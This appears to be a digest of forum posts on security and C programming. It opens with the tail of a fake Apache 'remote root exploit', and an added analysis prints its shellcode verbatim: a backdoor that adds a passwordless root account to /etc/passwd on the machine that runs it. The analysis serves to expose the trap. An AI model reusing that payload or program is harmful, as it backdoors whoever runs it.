        printf("Connection refused\n");
        exit(1);
    }
    printf("sending exploit code...\n");
    if (send(s, buffer, strlen(buffer), 0) != 1)
        printf("exploit was successful!\n");
    else
        printf("sorry, this site isn't vulnerable\n");
    printf("waiting for shell.....\n");
    if (fork() == 0)
        execl("/bin/sh", "sh", "-c", evil, 0);
    else
        wait(NULL);
    while (1) {
        /* shell */
    }
}

Or: [C] /* apachesm4sh.c apache 2.2.17 remote root exploit*/ /* KEEP PRIV8&!&! leak and - Pastebin.com

Discussion here, it is possible that it is not an exploit: Full Disclosure: Apache 2.2.17 exploit?
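An added example (not from the original post or the Full Disclosure thread) of the check that settles the question: decode the evil[] bytes copied verbatim from the listing above and list their printable strings. The only string is a /bin/sh -c command that appends a root account to /etc/passwd, and it is the same buffer the listing later hands to execl() on the machine running the program, so the file acts on whoever runs it, not on the "target".

```c
/* Added example, not code from the original post: before anyone runs a
 * posted "exploit", look at what its payload contains. The bytes below are
 * copied verbatim from the evil[] array in apachesm4sh.c above; the string
 * extraction is ours and only reads the buffer, it never executes it. */
#include <stdio.h>
#include <string.h>

#define MAX_STRINGS 16
#define MAX_STRLEN  128

/* The evil[] bytes from the listing above. The '#' bytes are where the
 * code later writes NUL separators (mov byte [esi+7], al and friends). */
static const unsigned char payload[] =
    "\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88\x46\x47\x89"
    "\x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89\x5e\x51\x89"
    "\x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55\xcd\x80\xe8"
    "\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d\x63\x23"
    "\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30\x30\x30\x74"
    "\x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30\x64\x65\x3a"
    "\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68"
    "\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
    "\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44\x44"
    "\x44\x44";
#define PAYLOAD_LEN (sizeof(payload) - 1)  /* exclude the literal's terminator */

/* Copy every run of at least min_len printable ASCII bytes in buf[0..len)
 * into out[], NUL-terminated; returns how many runs were stored (at most
 * max_out). This is what the strings(1) utility does, written by hand. */
int extract_strings(const unsigned char *buf, size_t len, size_t min_len,
                    char out[][MAX_STRLEN], int max_out)
{
    int found = 0;
    size_t start = 0;
    int in_run = 0;

    for (size_t i = 0; i <= len; i++) {
        /* i == len is a sentinel that flushes a run ending at the buffer end */
        int printable = (i < len) && buf[i] >= 0x20 && buf[i] <= 0x7e;
        if (printable && !in_run) {
            in_run = 1;
            start = i;
        } else if (!printable && in_run) {
            size_t run = i - start;
            in_run = 0;
            if (run >= min_len && found < max_out) {
                if (run > MAX_STRLEN - 1)
                    run = MAX_STRLEN - 1;   /* truncate rather than overflow out[] */
                memcpy(out[found], buf + start, run);
                out[found][run] = '\0';
                found++;
            }
        }
    }
    return found;
}

/* Does the payload name local system files? A "remote" exploit whose
 * shellcode mentions /etc/passwd and is then passed to execl() locally is
 * the backdoor pattern discussed in the thread above. */
int payload_touches_local_files(const unsigned char *buf, size_t len)
{
    char strs[MAX_STRINGS][MAX_STRLEN];
    int n = extract_strings(buf, len, 4, strs, MAX_STRINGS);
    for (int i = 0; i < n; i++)
        if (strstr(strs[i], "/etc/passwd") || strstr(strs[i], "/bin/sh"))
            return 1;
    return 0;
}

/* Convenience wrappers over the embedded payload; results are kept in a
 * static buffer so each extracted string can be inspected by index. */
static char g_strs[MAX_STRINGS][MAX_STRLEN];

int analyze_embedded_payload(void)
{
    return extract_strings(payload, PAYLOAD_LEN, 4, g_strs, MAX_STRINGS);
}

const char *embedded_payload_string(int i)
{
    return g_strs[i];
}

int main(void)
{
    int n = analyze_embedded_payload();
    printf("%zu-byte payload, %d printable string(s) of 4+ bytes:\n", PAYLOAD_LEN, n);
    for (int i = 0; i < n; i++)
        printf("  \"%s\"\n", embedded_payload_string(i));
    printf("references local files: %s\n",
           payload_touches_local_files(payload, PAYLOAD_LEN) ? "yes" : "no");
    return 0;
}
```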
18. Analysis of 250,000 hacker conversations

Posted on 17 October 2011.

Imperva released a report analyzing the content and activities of an online hacker forum with nearly 220,000 registered members, although many are dormant. This forum is used by hackers for training, communications, collaboration, recruitment, commerce and even social interaction. Commercially, this forum serves as a marketplace for the selling of stolen data and attack software. The chat rooms are filled with technical subjects ranging from advice on attack planning to solicitations for help with specific campaigns. This forum is also a place where curious neophytes can find "how-to-hack" tutorials on various methods. The report not only provides insight into hacker psychology, but also details the technical strategies they learn, develop and deploy.

"Studying hacker forums is important to providing insights into hacker psychology and technical strategies," explained Imperva CTO Amichai Shulman. "Hacker forums are still not well understood by many in the security community, and we believe that studying and quantifying what happens in these online communities can lead to the development of strategies to combat cybercrime."

The findings include:

Examples of hacker communications, collaboration, recruitment, commerce and social interaction activities.

Attack discussions on this forum increased over the four-year period of analysis, growing an average of 157% year over year between 2007 and 2010.

The most discussed topics in this forum from June 2010 to June 2011 were DoS/DDoS attacks, with 22% of discussions, followed by SQL injections, which comprised 19% of all discussions.

25% of discussions from June 2010 to June 2011 focused on "beginning" hacking, with members devoting 6% of their time sharing "how-to" tutorials and discussing basic methodologies, indicating a strong, steady interest from new talent.
Mobile hacking has seen very strong growth in this forum from 2007 to 2010, with iPhone hacking leading the way.

The complete report is available here: http://www.net-security.org/dl/articles/Imperva_Oct2011.pdf

Source: Analysis of 250,000 hacker conversations
19. C development on Linux - Introduction - I.

Category: Linux Development
Published on Monday, 17 October 2011 13:26

Contents
1. Introduction
1.1. Why C?
2. About C
2.1. History
2.2. Classification
2.3. Our approach
3. The necessary tools
4. The compilation process
5. Example C program
6. Conclusion

1. Introduction

What you're just reading is the beginning of a series of articles dedicated to development on Linux systems. However, with minor modifications (if any), you will be able to use the knowledge you will get by reading our series on any other system that uses the same tools (OpenIndiana, BSD...). This first article will deal gradually with the intricacies of writing C code on Linux. You are expected to have basic programming knowledge, either on Linux/Unix systems or on other platforms. The idea is that you should know the basics of programming, like what a variable is or how to define a structure. Even though you will get this information from this article, we won't insist very much on beginner-level concepts. A word of warning: we won't include everything there is to tell about C, because that would take lots of space and, of course, we don't actually know everything about C.

1.1. Why C?

Some of you might argue that C is not the best beginner-level language ever. Agreed, but again, you're expected to have some basic programming knowledge, for one. Second, C and Unix, and Linux afterwards, are so intimately tied together that it only seemed natural to start our development series with C. From the kernel, a substantial part of which is written in C, to lots of everyday user-land applications, C is used massively on your Linux system. For example, GTK is based on C, so if you're using Gnome or XFCE applications, you're using C-based applications. C is an old, well-established programming language, a vital tool in many parts of the IT world, from embedded systems to mainframes.
Therefore, it is only fair to assume that C skills will not only enrich your CV, but they will also help you to solve many issues on your Linux system; that is, only if you take this seriously and practice a lot by reading and writing C code.

2. About C

2.1. History

C is more than 40 years old, with beginnings at Bell Labs with Brian Kernighan, Dennis Ritchie and Ken Thompson as the "usual suspects." Unix development and C's evolution are intimately linked, as we said, because Unix was initially written in assembly, but that had lots of shortcomings. Therefore, when moving to the PDP-11 as the main hardware platform, the developers started C as a core language for Unix. In 1978, Kernighan and Ritchie wrote "The C Programming Language," a book that is today as it was 20 years ago: THE book on C programming. We heartily recommend you get it.

2.2. Classification

There are always people keen on classification of things and, of course, programming is no different. Joking aside, since we're at the beginning, we thought you should know that C is a procedural structured programming language, with weak typing. What we just said, in English, is that C uses procedures (the usual name used by C programmers, and the one we'll use as well, is functions, however), that it uses a structured approach (think blocks of code) and finally, it supports implicit type conversions. If you don't know what any of the above means, fear not, you'll find out!

2.3. Our approach

This article is just the introductory part, and we will regularly publish the next parts, where each chapter will deal with an important part of the language: variables, pointers, structs, etc. (subscribe to RSS if you have not done so yet). At the end of the theoretical part, we will show you a practical example, for which we chose yest, a tiny piece of software written by Kimball Hawkins (thanks, Kimball). We will compile it, then package it for Debian and Fedora systems.
Debian developer Andree Leidenfrost will then show you how to submit our new package to the Debian repository, making sure we respect all package requirements to be admitted to the Debian distribution (thanks, Andree). We recommend you try our examples on your system, take some time to examine the code and try to make modifications of your own.

3. The necessary tools

Before we begin, let us make sure we have all essential tools installed on your Linux system. You will need a compiler, namely gcc, the binutils package and a text editor or an IDE. Whether you choose a text editor or some sort of IDE depends largely on your preferences, but more on that later. Depending on your Linux distribution and the installation options you have used, you might already have the necessary tools installed. We put together a tiny script to help you see whether you have all mandatory development tools installed:

#!/bin/sh
gcc -v
if [ $? != 0 ]; then
    echo "GCC is not installed!"
fi
ld -v
if [ $? != 0 ]; then
    echo "Please install binutils!"
fi

Save this script as devtoolscheck.sh, run it:

$ sh devtoolscheck.sh

On my machine I get the following output:

$ sh devtools.sh
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/lib/x86_64-linux-gnu/gcc/x86_64-linux-gnu/4.6.1/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Debian 4.6.1-4' --with-bugurl=file:///usr/share/doc/gcc-4.6/README.Bugs --enable-languages=c,c++,fortran,objc,obj-c++,go --prefix=/usr --program-suffix=-4.6 --enable-shared --enable-multiarch [config options snipped]
Thread model: posix
gcc version 4.6.1 (Debian 4.6.1-4)
GNU ld (GNU Binutils for Debian) 2.21.52.20110606

Why you need binutils binaries and gcc, you will see shortly. Now let's focus a bit on the "editor vs IDE" question. The only thing we will advise you in this respect is "use what you feel comfortable with and disregard what others tell you". This matter is very subjective and it depends on many variables.
For example, if you develop (or used to develop) on other operating systems, you might be used to an IDE. You will find many good IDEs on Linux, including Eclipse, Geany, KDevelop or Anjuta. Try installing them to see what you find more suitable. On the other hand, if you want to go the simple editor way, there are lots of options here as well: vi(m), emacs, kate, nano, jed and so on. By searching the Internet you will find a lot of discussions regarding what the best editor is. We say install a few of them and find out what suits you best. You are the only judge of this, and it will be a tool you will use frequently, so take your time, use it, read about it and get familiar with it. Regardless of your choice, we will assume that you have made your choice in regards to the editing tool and you are familiar with its use.

4. The compilation process

In simple words, this process is what starts from the source code you wrote and, if all goes well, the result is an executable binary or a library. Needless to say, there's more to it, but it is essential for you to understand the above sentence before you move on. You do not need to memorize all the concepts now as they will become clearer later. At this stage it's only important to get the general idea. Let's say we have the source code written and now we want a compiler to process it and give us the executable binary. The workflow of this process is illustrated on your right. Please note that this is applicable only to C, which is a compiled language, as opposed to interpreted languages (Perl, Python, Shell), and we will refer strictly to gcc and friends for the rest of our guide. As the figure on your right illustrates, the preprocessor (cpp) takes your source code, looks for preprocessor instructions (in C, they start with a hash) and, if everything looks right, the result is an output understandable by the compiler.
The compiler (gcc) does all the hard work, including code optimization for the underlying hardware (if you are interested in compiler theory or cross-compilation, there are lots of good books on the subject, but we assume a more beginner level here). The result is assembly code, intimately close to the machine, from which the binaries will be generated (as is the tool). In the end, depending on the options and the code, "ld" will link the executable to all necessary libraries and voila! the end result: your program. If you want to see all the resulting intermediate files, the gcc flag -save-temps will help you to do so. We recommend you read the gcc manual page, at least frugally, and make sure that your compiler is up to date. You will get used to the usual gcc flags by reading our examples, but you are expected to know what they do, not just copy and paste commands you see on the screen.

5. Example C program

Every self-respecting programming tutorial starts with a "Hello, world" program. This program does nothing else but print "Hello, world!" on the screen, then exits. It's used to illustrate the very basic structure of a program and some essential concepts. So, without further ado, here it is.

#include <stdio.h>

/* This is a comment */

int main()
{
    printf("Hello, world!\n");
    return 0;
}

Now, let us dissect the program line by line and see what each line represents. The first one is a preprocessor directive (see above) which asks for the stdio.h file, which provides the definition for the printf function. Header files are files that usually contain various definitions (functions, variables...) and make .c files less cluttered. All that a source file (.c) will need is an #include statement and possibly an argument to the linker. Everything that's defined in the included header file will be available in your source code. main() is a mandatory function in every C program.
As the name states, the main activity will happen here, regardless of how many functions you have defined. int main() means that this function does not have any arguments (the empty parentheses) and that it returns an integer (the initial int). All these will be discussed later. The most important thing here is the printf function, which takes our text as an argument and displays it. "\n" means "newline" and it's the equivalent of using the Enter key (or ^M). It is called an escape sequence and all escape sequences in C begin with "\". For example, to better understand what an escape sequence is, imagine you're writing HTML code and you need to print a "<" character. HTML's syntax uses angle brackets to define HTML tags, so chances are your bracket will be interpreted as HTML code instead of being displayed. So, what to do? We escape it with "&lt;" and it will appear properly. Just the same, if you want to insert a newline character, you can't type it directly, as the compiler could care less if you write your program on a single line or not, and therefore you need to escape your newline character with "\n". return 0 tells the compiler that everything is ok and the execution of the main() function ends there. That is because 0 is the code for successful execution, while values greater than 0 (integers) are an indication that something went wrong. The curly braces that begin and end the main function delimit its execution block; that is, what happens in main(), stays in main(). You may have noticed the semicolons at the end of the statements: they are mandatory as a sign that the current statement ended there, but they are not to be used in preprocessor directives such as #include.

6. Conclusion

We hope we didn't cram too much information into your brain and that you will enjoy staying with us on this programming tutorial. Part 2 will deal with a comparison between C and other programming languages in order to help those who already have some experience in development.
So make sure you are subscribed to our RSS feed so you'll know when part two arrives. Here's what you should expect:

I. C development on Linux - Introduction
II. Comparison between C and other programming languages
III. Types, operators, variables
IV. Flow control
V. Functions
VI. Pointers and arrays
VII. Structures
VIII. Basic I/O
IX. Coding style and recommendations
X. Building a program
XI. Packaging for Debian and Fedora
XII. Getting a package in the official Debian repositories

We reserve the right to alter the list at any time necessary. Seriously, although this is a rough overview of what's to come, we might change our mind regarding titles or subtopics, but the general idea will be as above.

[EDIT]: Today, 08.10.2011, marks the sad event of Dennis Ritchie passing away after a long struggle with illness. We cannot even begin to comprise the influence he had on the IT industry. Dennis, we owe you so much. This guide is dedicated to your memory. May you rest in peace.

About Author: Rares Aioanei
I have been using Linux/BSD since about 2003, passionate about everything that involves Linux/BSD and Free Software. Contributor to various FOSS projects and your average system administrator in everyday life.

Source: C development on Linux - Introduction - I.
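An added example (not part of the tutorial above) of the escape-sequence translation the article describes, done at run time: the compiler turns the two characters backslash and n inside a string literal into one newline byte, and this small decoder does the same for a string it is handed, refusing unknown escapes and output that would not fit its buffer. The function name unescape() is ours.

```c
/* Added example, not part of the tutorial: the two characters '\' and 'n'
 * inside a C string literal become a single newline byte at compile time.
 * unescape() performs that translation at run time so you can watch it. */
#include <stdio.h>
#include <string.h>

/* Translate C escape sequences in src into the bytes they stand for.
 * Writes at most dst_size - 1 bytes plus a terminator into dst.
 * Returns the number of bytes produced, or -1 for an unknown escape or
 * when the result would not fit (the destination is never overrun). */
int unescape(const char *src, char *dst, size_t dst_size)
{
    size_t out = 0;

    for (size_t i = 0; src[i] != '\0'; i++) {
        char c = src[i];
        if (c == '\\') {
            i++;                              /* the character after the backslash */
            switch (src[i]) {
            case 'n':  c = '\n'; break;       /* newline, what "Hello, world!\n" ends with */
            case 't':  c = '\t'; break;       /* horizontal tab */
            case 'r':  c = '\r'; break;       /* carriage return (the ^M the article mentions) */
            case '\\': c = '\\'; break;       /* a literal backslash */
            case '"':  c = '"';  break;       /* a literal double quote */
            default:   return -1;             /* unknown or dangling escape: reject it */
            }
        }
        if (out + 1 >= dst_size)
            return -1;                        /* no room for this byte plus the terminator */
        dst[out++] = c;
    }
    dst[out] = '\0';
    return (int)out;
}

int main(void)
{
    char buf[64];
    /* This literal is written as \\n, so at run time it holds a real
     * backslash followed by an 'n' and unescape() has work to do. */
    int n = unescape("Hello, world!\\n", buf, sizeof buf);
    if (n < 0)
        return 1;                             /* non-zero: tell the shell something went wrong */
    fputs(buf, stdout);                       /* prints Hello, world! followed by a real newline */
    return 0;                                 /* 0: success, as the article explains */
}
```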
20. Crap. Yet another of the thousands of pieces of junk circulating by mail/messenger or even Facebook. There is no good/evil, light/darkness; practically, not many things exist. For example, light doesn't exist, there are photons that propagate at the speed of light (in a vacuum), which on contact with matter (solid, for us) "reflect" and reach the eyes of stupid people who go "Whoa, light from Gooood". And colours are just the different way these photons "reflect" on contact with other surfaces, depending on the surface in question. The discussion is pathetic and was invented (I don't think I'm wrong when I say this) by a loser: a person who is clueless about both religion and science. God is neither good nor evil, he is neutral if we can put it that way (religiously speaking, and as an example: the flood; explain that to yourselves). And the thing about the 5 senses is, scientifically, an illogical piece of nonsense, used irrationally. "It uses electricity and magnetism, but NOBODY has seen or fully understood either of these two" Go stick your hands in the socket, kids with no future; something that doesn't exist (has no smell, has no balls...) can't kill you. Anyway, yet another turd on earth, created for incapable people. And Einstein is there just for marketing; if that line weren't there, you wouldn't give a damn about this text.
  21. Nytro

    Hack A server

    I talked to him and it is something serious. Please, no absurd and useless comments.
22. Internet Explorer is the safest Web browser!? Ha!

By Steven J. Vaughan-Nichols | October 12, 2011, 8:46am PDT

Summary: Microsoft is trying again to con people into thinking that Internet Explorer is the safest browser around. It's not. At best, it's tied with Chrome.

Microsoft has always been fond of paying analysts to say that its products are best, or having partners release reports showing how their rivals' products are second-rate, and, now, Web sites that "show" how Internet Explorer (IE) is better than Chrome and Firefox when it comes to security. Really?

Didn't Microsoft just release yet another major Internet Explorer patch? I quote from the IE patch update (MS11-081), which applies to all currently supported versions of Microsoft Windows and Internet Explorer and IE 6 as well: "The most severe vulnerabilities could allow remote code execution if a user views a specially crafted Web page using Internet Explorer. An attacker who successfully exploited any of these vulnerabilities could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights."

Yes, that includes IE 9, the best and most up-to-date IE, which is only available on Windows 7. Isn't it funny how Microsoft claims that IE 9 is the most secure of its browser family, but somehow it has to have the same problems fixed that exist in IE 6, 7, and 8? Could it be that it's really not that different after all from the rest of its historically insecure family?

If you go to Microsoft's Web browser security "test" site, Your Browser Matters, though, it will tell you that IE 9, with a score of four, is the most secure browser of all. Funny, it told me that it was the most secure both before and after the patch. As for the other browsers, it informs me that Firefox 7.01 only rates a 2, and Chrome 14 gets a 2.5.
And these, I might add, were my scores on my Mint Linux desktop!

How can they produce such clearly nonsensical results? It's because they're setting the rules on what's important and what's not. So, for example, Microsoft gives IE full credit for its SmartScreen malware detection software. With SmartScreen, software that is signed with a digital certificate that Microsoft trusts is allowed to be saved or run. Chrome, on the other hand, blocks known malware, but lets you save unknown, potentially dangerous programs.

On the other hand, if you do download malware with Chrome, the program is still stuck in a sandbox, where it has very limited abilities to actually attack your system. Besides that, Chrome automatically upgrades browser extensions as security fixes come out. Since programs like Adobe Flash are often used for attacks these days, and in Flash's case there have been 17 significant patches in the last 16 months, I think automatic security updates for Flash and other potential problem programs are a big deal. While Microsoft acknowledges that it doesn't provide these important features, it doesn't take away any points for lacking them from its perfect score. Interesting judgement call there, Microsoft.

Johnathan Nightingale, Mozilla's director of Firefox engineering, also has trouble with what factors Microsoft considers important and what it doesn't. "Mozilla is fiercely proud of our long track record of leadership on security. We believe that being safe on the Web means having a robust browser that defends against malware and phishing, includes new technologies to help sites and users secure themselves, and a responsive security team that gets security updates out quickly and reliably. Microsoft's site is more notable for the things it fails to include: security technologies like HSTS [HTTP Strict Transport Security], privacy tools like Do Not Track, and vendor response time when vulnerabilities are discovered," said Nightingale.

Exactly so.
Firefox has long been a leader in browser security. True, Microsoft has gotten a lot better about security, but Firefox was doing it when the horribly unsafe IE 6 was still the best Microsoft could do.

True, today you can make Windows and IE relatively safe. No, really, you can. All you have to do is constantly and regularly patch it. Those of us who use other operating systems, like Linux and Mac OS X, and alternative browsers such as Chrome and Firefox, can sit back and relax more.

Don't get me wrong. We must patch our software as well. As security guru Bruce Schneier points out, "Security is a process, not a product." Security also isn't something, though, that you measure by a Web site that, when you get down to it, simply checks to see whether the browser you're running is IE 9 or not. Deciding what's a secure Web browser is a lot more complicated than that. Personally, thanks to Chrome's auto-updating and sandboxing, I feel a lot safer running Chrome on Windows than I ever will running IE.

Source: http://www.zdnet.com/blog/networking/internet-explorer-is-the-safest-web-browser-ha/1546
23. TaskManager Runs on 64-bit Excel

Filed under: My Software - Didier Stevens @ 11:21

I'm releasing a new version of TaskManager.xls that runs on Excel 2010 64-bit too. The previous version ran on 64-bit Windows, provided you used Excel 32-bit. But this new version runs on both implementations of Excel.

Download: http://didierstevens.com/files/software/TaskManager_V0_1_0.zip

As you may know, Excel offers a Visual Basic Editor in which you can create macros using VB. It seems someone made a Task Manager. Well, for it to work, those macros have to be allowed to run: Tools > Options > Security > Advanced and Low for Macro (I don't recommend it).

Source code:

' TaskManager.xls v0.1.0
' Non-exhaustive list of sources:
' http://www.ex-designz.net/apidetail.asp?api_id=351
' http://www.xtremevbtalk.com/archive/index.php/t-248755.html
' http://msdn.microsoft.com/en-us/library/ms684335%28v=vs.85%29.aspx
'
' http://didierstevens.com
' Use at your own risk
'
' Shortcommings, or todo's ;-)
'
' History:
' 2011/02/02: start
' 2011/02/04: v0.0.2 added GetTimes
' 2011/02/21: v0.0.3 added GetType
' 2011/02/22: added GetProcessFilename
' 2011/02/23: added AdjustTokenForDebug
' 2011/10/09: v0.1.0 added support for 64-bit Excel

Option Explicit

Private Const TH32CS_SNAPHEAPLIST = &H1
Private Const TH32CS_SNAPPROCESS = &H2
Private Const TH32CS_SNAPTHREAD = &H4
Private Const TH32CS_SNAPMODULE = &H8
Private Const TH32CS_INHERIT = &H80000000
Private Const MAX_PATH = 260
Private Const INVALID_HANDLE_VALUE = -1&
Private Const PROCESS_TERMINATE = &H1
Private Const PROCESS_QUERY_INFORMATION = &H400
Private Const PROCESS_VM_READ = &H10
Private Const THREAD_SUSPEND_RESUME = &H2
Private Const TOKEN_QUERY = &H8
Private Const TokenUser = 1
Private Const TOKEN_ADJUST_PRIVILEGES = &H20
Private Const SE_PRIVILEGE_ENABLED = &H2

#If Win64 Then
Private Type PROCESSENTRY32
    dwSize As Long
    cntUsage As Long
    th32ProcessID As Long
    th32DefaultHeapID As Long
    th32DefaultHeapIDB As Long
    th32ModuleID As Long
    cntThreads As Long
    th32ParentProcessID As Long
    pcPriClassBase As Long
    pcPriClassBaseB As Long
    dwFlags As Long
    szExeFile As String * MAX_PATH
End Type
#Else
Private Type PROCESSENTRY32
    dwSize As Long
    cntUsage As Long
    th32ProcessID As Long
    th32DefaultHeapID As Long
    th32ModuleID As Long
    cntThreads As Long
    th32ParentProcessID As Long
    pcPriClassBase As Long
    dwFlags As Long
    szExeFile As String * MAX_PATH
End Type
#End If

Private Type THREADENTRY32
    dwSize As Long
    cntUsage As Long
    th32ThreadID As Long
    rh32OwnerProcessID As Long
    tpBasePri As Long
    tpDeltaPri As Long
    dwFlags As Long
End Type

Private Type FILETIME
    dwLowDateTime As Long
    dwHighDateTime As Long
End Type

Private Type SYSTEMTIME
    wYear As Integer
    wMonth As Integer
    wDayOfWeek As Integer
    wDay As Integer
    wHour As Integer
    wMinute As Integer
    wSecond As Integer
    wMilliseconds As Integer
End Type

#If Win64 Then
Private Type SYSTEM_INFO
    wProcessorArchitecture As Integer
    wReserved As Integer
    lpMinimumApplicationAddress As LongPtr
    lpMaximumApplicationAddress As LongPtr
    dwActiveProcessorMask As Long
    dwNumberOfProcessors As Long
    dwProcessorType As Long
    dwAllocationGranularity As Long
    wProcessorLevel As Long
    wProcessorRevision As Long
End Type
#Else
Private Type SYSTEM_INFO
    wProcessorArchitecture As Integer
    wReserved As Integer
    lpMinimumApplicationAddress As Long
    lpMaximumApplicationAddress As Long
    dwActiveProcessorMask As Long
    dwNumberOfProcessors As Long
    dwProcessorType As Long
    dwAllocationGranularity As Long
    wProcessorLevel As Long
    wProcessorRevision As Long
End Type
#End If

Private Type LUID
    lowpart As Long
    highpart As Long
End Type

Private Type TOKEN_PRIVILEGES
    PrivilegeCount As Long
    LuidUDT As LUID
    Attributes As Long
End Type

#If Win64 Then
Private Declare PtrSafe Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal lFlags As LongLong, ByVal lProcessID As LongLong) As LongPtr
Private Declare PtrSafe Sub CloseHandle Lib "kernel32" (ByVal hPass As LongPtr)
Private Declare PtrSafe Function Process32First Lib "kernel32" (ByVal hSnapshot As LongPtr, sPE32 As PROCESSENTRY32) As Long
Private Declare PtrSafe Function Process32Next Lib "kernel32" (ByVal hSnapshot As LongPtr, sPE32 As PROCESSENTRY32) As Long
Private Declare PtrSafe Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccessas As Long, ByVal bInheritHandle As Boolean, ByVal dwProcId As Long) As LongPtr
Private Declare PtrSafe Function TerminateProcess Lib "kernel32" (ByVal hProcess As LongPtr, ByVal uExitCode As Long) As Long
Private Declare PtrSafe Function Thread32First Lib "kernel32" (ByVal hSnapshot As LongPtr, uProcess As THREADENTRY32) As Long
Private Declare PtrSafe Function Thread32Next Lib "kernel32" (ByVal hSnapshot As LongPtr, uProcess As THREADENTRY32) As Long
Private Declare PtrSafe Function OpenThread Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Boolean, ByVal dwThreadId As Long) As LongPtr
Private Declare PtrSafe Function SuspendThread Lib "kernel32.dll" (ByVal hThread As LongPtr) As Integer
Private Declare PtrSafe Function ResumeThread Lib "kernel32.dll" (ByVal hThread As LongPtr) As Integer
Private Declare PtrSafe Function OpenProcessToken Lib "advapi32.dll" (ByVal ProcessHandle As LongPtr, ByVal DesiredAccess As Long, ByRef TokenHandle As LongPtr) As Long
Private Declare PtrSafe Function GetTokenInformation Lib "advapi32.dll" (ByVal TokenHandle As LongPtr, ByVal TokenInformationClass As Long, TokenInformation As Any, ByVal TokenInformationLength As Long, ByRef ReturnLength As Long) As Long
Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (ByRef pTo As Any, ByRef uFrom As Any, ByVal lSize As LongLong)
Private Declare PtrSafe Function LookupAccountSid Lib "advapi32.dll" Alias "LookupAccountSidA" (ByVal lpSystemName As String, ByVal Sid As Long, ByVal name As String, cbName As Long, ByVal ReferencedDomainName As String, cbReferencedDomainName As Long, peUse As Long) As Long
Private Declare PtrSafe Function GetProcessTimes Lib "kernel32" (ByVal hProcess As LongPtr, lpCreationTime As FILETIME, lpExitTime As FILETIME, lpKernelTime As FILETIME, lpUserTime As FILETIME) As Long
Private Declare PtrSafe Function FileTimeToLocalFileTime Lib "kernel32" (lpFileTime As FILETIME, lpLocalFileTime As FILETIME) As Long
Private Declare PtrSafe Function FileTimeToSystemTime Lib "kernel32" (lpFileTime As FILETIME, lpSystemTime As SYSTEMTIME) As Long
Private Declare PtrSafe Function IsWow64Process Lib "kernel32" (ByVal hProcess As LongPtr, ByRef Wow64Process As Long) As Long
Private Declare PtrSafe Sub GetNativeSystemInfo Lib "kernel32" (ByRef lpSystemInfo As SYSTEM_INFO)
Private Declare PtrSafe Function GetProcessImageFileName Lib "psapi" Alias "GetProcessImageFileNameA" (ByVal hProcess As LongPtr, ByVal lpFilename As String, ByVal nSize As LongLong) As Long
Private Declare PtrSafe Function K32GetProcessImageFileName Lib "kernel32" Alias "K32GetProcessImageFileNameA" (ByVal hProcess As LongPtr, ByVal lpFilename As String, ByVal nSize As LongLong) As Long
Private Declare PtrSafe Function QueryDosDevice Lib "kernel32" Alias "QueryDosDeviceA" (ByVal lpDeviceName As String, ByVal lpTargetPath As String, ByVal ucchMax As Long) As Long
Private Declare PtrSafe Function GetCurrentProcess Lib "kernel32" () As LongPtr
Private Declare PtrSafe Function LookupPrivilegeValue Lib "advapi32" Alias "LookupPrivilegeValueA" (ByVal lpSystemName As String, ByVal lpName As String, lpLuid As LUID) As Long
Private Declare PtrSafe Function AdjustTokenPrivileges Lib "advapi32" (ByVal TokenHandle As LongPtr, ByVal DisableAllPrivileges As Long, NewState As TOKEN_PRIVILEGES, ByVal BufferLength As Long, PreviousState As Any, ReturnLength As Any) As Long
#Else
Private Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal lFlags As Long, ByVal lProcessID As Long) As Long
Private Declare Sub CloseHandle Lib "kernel32" (ByVal hPass As Long)
Private Declare Function Process32First Lib "kernel32" (ByVal hSnapshot As Long, sPE32 As PROCESSENTRY32) As Long
Private Declare Function Process32Next Lib "kernel32" (ByVal hSnapshot As Long, sPE32 As PROCESSENTRY32) As Long
Private Declare Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccessas As Long, ByVal bInheritHandle As Boolean, ByVal dwProcId As Long) As Long
Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long
Private Declare Function Thread32First Lib "kernel32" (ByVal hSnapshot As Long, uProcess As THREADENTRY32) As Long
Private Declare Function Thread32Next Lib "kernel32" (ByVal hSnapshot As Long, uProcess As THREADENTRY32) As Long
Private Declare Function OpenThread Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Boolean, ByVal dwThreadId As Long) As Long
Private Declare Function SuspendThread Lib "kernel32.dll" (ByVal hThread As Long) As Integer
Private Declare Function ResumeThread Lib "kernel32.dll" (ByVal hThread As Long) As Integer
Private Declare Function OpenProcessToken Lib "advapi32.dll" (ByVal ProcessHandle As Long, ByVal DesiredAccess As Long, ByRef TokenHandle As Long) As Long
Private Declare Function GetTokenInformation Lib "advapi32.dll" (ByVal TokenHandle As Long, ByVal TokenInformationClass As Long, TokenInformation As Any, ByVal TokenInformationLength As Long, ByRef ReturnLength As Long) As Long
Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (ByRef pTo As Any, ByRef uFrom As Any, ByVal lSize As Long)
Private Declare Function LookupAccountSid Lib "advapi32.dll" Alias "LookupAccountSidA" (ByVal lpSystemName As String, ByVal Sid As Long, ByVal name As String, cbName As Long, ByVal ReferencedDomainName As String, cbReferencedDomainName As Long, peUse As Long) As Long
